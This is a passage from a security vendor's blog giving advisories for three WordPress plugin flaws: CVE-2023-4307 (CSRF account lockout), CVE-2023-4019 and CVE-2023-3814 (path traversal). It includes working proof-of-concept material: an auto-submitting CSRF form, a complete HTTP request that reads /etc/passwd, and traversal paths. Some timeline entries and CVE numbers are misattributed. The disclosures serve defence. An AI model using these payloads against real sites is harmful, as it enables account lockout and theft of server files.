    By addressing the RCE vulnerability in the Prevent files / folders access plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the integrity of their web applications.

    #WordPressSecurity #RemoteCodeExecution #WebsiteSafety #StayProtected #VeryCriticalVulnerability

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website

  • CVE-2023-4307 – Lock User Account

    CVE-2023-4307 – Lock User Account <= 1.0.3 - Arbitrary Lock/Unlock All Account's via CSRF

    In the pursuit of robust website security, a profound vulnerability has emerged during the assessment of WordPress plugins. A striking vulnerability within the Lock User Account plugin was discovered, heralding a serious threat. This vulnerability exposes an avenue for malicious attackers to enact an untraceable lockout of all user accounts, capitalizing on a Cross-Site Request Forgery (CSRF) vulnerability.

    Main info:

    CVECVE-2023-4307
    PluginLock User Account
    CriticalHigh
    Publicly PublishedAugust 21, 2023
    Last UpdatedAugust 21, 2023
    ResearcherDmtirii Ignatyev
    OWASP TOP-10A2: Broken Authentication and Session Management
    PoCYes
    ExploitNo
    Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4307
    https://wpscan.com/vulnerability/06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3
    Plugin Security Certification by CleanTalk

    Timeline

    August 4, 2023Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
    August 4, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    August 12, 2023The author has removed his plugin from WordPress library
    August 22, 2023Registered CVE-2023-4307

    Discovery of the Vulnerability

    In the process of testing the plugin, which makes it possible to block the account of any user, a CSRF vulnerability was found, which allows the administrator to block all accounts when clicking on a malicious link. At the same time, the administrator will not know about it. There is no _wpnonce check in the plugin

    Understanding of CSRF attack’s

    Cybercriminals can craft a malicious link that, when clicked by an unwitting administrator, invokes unauthorized actions within the Lock User Account plugin. The impact is astounding – the attacker can swiftly lock all user accounts without the administrator’s knowledge. The lack of an essential _wpnonce check in the plugin facilitates this alarming exploit. CSRF – OWASP TOP-10

    Exploiting the CSRF vulnerability

    Administrators unknowingly executing the malicious link could inadvertently freeze every WordPress user’s account. The implications are severe, rendering the website inaccessible to users and disrupting the digital ecosystem.

    POC html code:

    <html>

      <body>

      <script>history.pushState(”, ”, ‘/’)</script>

        <form action=”http://your_site/wordpress/wp-admin/users.php”>

          <input type=”hidden” name=”s” value=”” />

          <input type=”hidden” name=”action” value=”lock” />

          <input type=”hidden” name=”new&#95;role” value=”” />

          <input type=”hidden” name=”paged” value=”1″ />

          <input type=”hidden” name=”users&#91;0&#93;” value=”1″ />

          <input type=”hidden” name=”users&#91;1&#93;” value=”2″ />

          <input type=”hidden” name=”users&#91;2&#93;” value=”3″ />

          <input type=”hidden” name=”users&#91;3&#93;” value=”4″ />

          <input type=”hidden” name=”action2″ value=”lock” />

          <input type=”hidden” name=”new&#95;role2″ value=”” />

          <input type=”submit” value=”Submit request” />

        </form>

        <script>

          document.forms[0].submit();

        </script>

      </body>

    </html>

    P.s. YOU CAN ADD ANY OTHER INPUT DATA WITH THE NAME=”USERS” AND THE VALUE=”YOUR_MAX_USERS_NUMBER”

    Potential Risks and Real-World Impact

    The CSRF vulnerability within the Lock User Account plugin introduces grave risks and potential scenarios:

    1. Unauthorized Account Blocking:
      An attacker could craft a malicious link and trick the administrator into clicking on it unknowingly. This would lead to the administrator unintentionally blocking all user accounts on the website.
    2. Mass Account Disruption:
      As all user accounts get blocked, it could lead to a mass disruption of user access to the website. This might cause significant inconvenience to users and damage the reputation of the website.
    3. Denial of Service (DoS):
      By blocking all accounts, the website may effectively experience a DoS situation, preventing legitimate users from accessing their accounts and using the website’s services.

    Recommendations for Improved Security

    Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:

    • Delete plugin:
      Since the plugin has been removed from the wordpress library, it is necessary to remove it. Current version will be vulnerable to this attack
    • Implement _wpnonce Verification::
      Enhance the plugin’s defenses by incorporating robust _wpnonce verification. This step acts as a formidable barrier against CSRF attacks, thwarting unauthorized actions.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • Educate Administrators:
      Educate administrators about the nature of CSRF attacks and the importance of cautious clicking. Raising awareness among your team can prevent inadvertent actions that could compromise site security.

    By disseminating this crucial information throughout the WordPress community, we can collectively bolster the security of countless websites. Share this knowledge to ensure that administrators are well-equipped to defend against the CVE-2023-4307 vulnerability and to maintain the safety of their WordPress sites.

    #WordPressSecurity #CSRFVulnerability #WebsiteProtection #StayInformed

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website

  • CVE-2023-4019 – Media from FTP < 11.17 - Author + Arbitrary File Access via Path Traversal

    CVE-2023-4019 – Media from FTP < 11.17 - Author + Arbitrary File Access via Path Traversal

    In a profound exploration of WordPress plugins, a chilling revelation has come to light. During meticulous testing, a high-impact vulnerability was unearthed within the Media from FTP plugin, specifically versions preceding 11.17. This alarming flaw exposes an avenue for attackers to exploit Path Traversal techniques, enabling unauthorized access to sensitive files and documents. The plugin does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.

    Main info:

    CVECVE-2023-4019
    PluginMedia from FTP
    CriticalHigh
    Publicly PublishedAugust 14, 2023
    Last UpdatedAugust 14, 2023
    ResearcherDmtirii Ignatyev
    OWASP TOP-10A5: Broken Access Control
    PoCYes
    ExploitWill be later
    Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4019
    https://wpscan.com/vulnerability/0d323b07-c6e7-4aba-85bc-64659ad0c85d
    Plugin Security Certification by CleanTalk

    Timeline

    July 26, 2023Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
    July 26, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    July 31, 2023The author has released a fix update
    August 14, 2023Registered CVE-2023-4019

    Discovery of the Vulnerability

    During testing of the plugin, a vulnerability was discovered in the mediafromftp-update-ajax-action, which allows downloading local folders outside of /var/www/html, which gives attackers a huge potential. They can download any local files in the media and then view them for example /etc/passwd, /etc/hosts and other local files/documents. This is possible on behalf of a user with Author rights. By default, the Author is not authorized to view local files and it cannot interact with them directly, viewing local files is very critical for the application owner. To eliminate this vulnerability, I ask you to validate the path that the user enters and if it does not contain a root directory, then do forbidden

    Understanding of Path Traversal attack’s

    Path Traversal, a notorious hacking technique, is at the core of this vulnerability. It involves manipulating file paths to breach directory boundaries and access files beyond the intended scope. Malicious actors exploit this to access files and directories that are otherwise restricted. Path Traversal OWASP TOP-10

    Exploiting the Path Traversal vulnerability

    Exploiting the CVE-2023-4019 vulnerability empowers attackers to venture outside the restricted directory of /var/www/html. This enables them to download local files, even those residing in sensitive system directories.

    POC:

    1) Go to /wordpress/wp-admin/admin.php?page=mediafromftp-search-register

    2) Select any file from the media text list below

    3) Click “Update Media”

    4) Intercept request with action=mediafromftp-update-ajax-action

    5) Сhange new_url to local dir like /etc/passwd or /etc/hosts

    POC request:

    POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

    Host: your_host

    User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0

    Accept: */*

    Accept-Language: en-US,en;q=0.5

    Accept-Encoding: gzip, deflate

    Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=mediafromftp-search-register

    Content-Type: application/x-www-form-urlencoded; charset=UTF-8

    X-Requested-With: XMLHttpRequest

    Content-Length: 123

    Origin: http://your_host

    DNT: 1

    Connection: close

    Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7Cb8692eb78cc5aa5fb9911291a78d34a0e04461ed834d1ca96b121cf1ef714aff; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7C1fe25db056c3038ca9accd05f2608008d9db007ec3d7b37572208454e3f62357; wp-settings-time-2=1690433465

    Sec-Fetch-Dest: empty

    Sec-Fetch-Mode: cors

    Sec-Fetch-Site: same-origin

    action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36

    Potential Risks and Real-World Impact

    The Path Traversal vulnerability within the Media from FTP plugin introduces grave risks and potential scenarios:

    1. Data Exposure:
      Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
    2. Malicious Use of Stolen Data:
      Extracted data from unauthorized file access could be used maliciously, undermining the integrity of the entire system.
    3. System Disruption:
      Access to sensitive files could lead to unintended modifications, potentially disrupting the functioning of the WordPress installation.

    Recommendations for Improved Security

    Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:

    • Immediate Plugin Update:
      Upgrade the Media from FTP plugin to version 11.17 or above. This update addresses the Path Traversal vulnerability and enhances security.
    • Input Validation:
      Developers should incorporate robust input validation mechanisms to ensure that user-provided data is sanitized and restricted to authorized directories.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • Path Validation:
      Implement robust path validation mechanisms to ensure that user-entered paths remain within the authorized directory scope.

    Empower the WordPress community with the knowledge of CVE-2023-4019. Share this article far and wide to ensure website owners take proactive measures against this critical vulnerability.

    #WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website

  • CVE-2023-3814 – Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access via Path Traversal

    CVE-2023-3814 – Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access via Path Traversal

    In the realm of WordPress plugins, a severe security vulnerability has been unveiled. A comprehensive testing process revealed a critical flaw within the Advanced File Manager plugin, specifically versions up to 5.1.1. This vulnerability exposes a significant security lapse that can potentially allow unauthorized access to files and folders through Path Traversal techniques.

    Main info:

    CVECVE-2023-3814
    PluginAdvanced File Manager
    CriticalHigh
    Publicly PublishedAugust 14, 2023
    Last UpdatedAugust 14, 2023
    ResearcherDmtirii Ignatyev
    OWASP TOP-10A5: Broken Access Control
    PoCYes
    ExploitWill be later
    Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3814
    https://wpscan.com/vulnerability/ca954ec6-6ebd-4d72-a323-570474e2e339
    Plugin Security Certification by CleanTalk

    Timeline

    July 13, 2023Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
    July 13, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    August 9, 2023The author has released a fix update
    August 14, 2023Registered CVE-2023-3814

    Discovery of the Vulnerability

    During testing, it was discovered that it is possible to change the root folder that the plugin will read and show information to the user. Usually in such plugins there is a restriction on exiting the /var/www/html directory, but in this plugin the root folder can be changed to any operating system directory like /home. And you can also perform the same actions using Path Traversal /var/www/html/../../../etc or /home and so on

    Understanding of Path Traversal attack’s

    Path Traversal is a hacking technique that involves manipulating file paths to access files and directories beyond the intended scope. Hackers can exploit this vulnerability to break out of the restricted directory and gain access to sensitive files and directories residing in other parts of the system. Path Traversal OWASP TOP-10

    Exploiting the Path Traversal vulnerability

    Exploiting this Path Traversal vulnerability within the Advanced File Manager plugin could empower attackers to change the root folder, allowing them to view, access, and potentially download files from locations that are off-limits under normal circumstances.

    POC:

    1. Go to settings page (/wordpress/wp-admin/admin.php?page=file_manager_advanced_controls)

    2. In the “Public Root Path” setting, change directory to /home or you can use Path Traversal /var/www/html/../../../home or /var/www/html/wordpress/../../../../etc

    3. Then navigate to the page of plugin (/wordpress/wp-admin/admin.php?page=file_manager_advanced_ui#elf_l1_Lw)

    4. You will be able to list the files/folders outside of WordPress root directory

    Potential Risks and Real-World Impact

    The Path Traversal vulnerability within the Advanced File Manager plugin introduces grave risks and potential scenarios:

    1. Data Exposure:
      Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
    2. Malicious Code Injection to OS folder’s:
      By manipulating file paths, hackers may insert malicious code into system files, leading to the compromise of the entire website.
    3. Escalation of Privileges:
      Exploiting this vulnerability could provide attackers with unauthorized administrative access, leading to unauthorized control and manipulation of the WordPress environment.

    Recommendations for Improved Security

    To fortify your WordPress website against the CVE-2023-3814 vulnerability and enhance overall security, consider implementing the following preventive measures:

    • Immediate Plugin Update:
      Upgrade to Advanced File Manager plugin version 5.1.2 or higher. This update addresses the Path Traversal vulnerability and strengthens security.
    • Input Validation:
      Developers should incorporate robust input validation mechanisms to ensure that user-provided data is sanitized and restricted to authorized directories.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • User Awareness:
      Educate administrators about the risks of clicking on unknown links or visiting suspicious websites, emphasizing the importance of vigilance.

    By addressing the Path Traversal vulnerability within the Advanced File Manager plugin and adhering to these security recommendations, you can safeguard your WordPress website from unauthorized file and folder access, mitigating potential breaches and preserving the confidentiality of your data.

    #WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website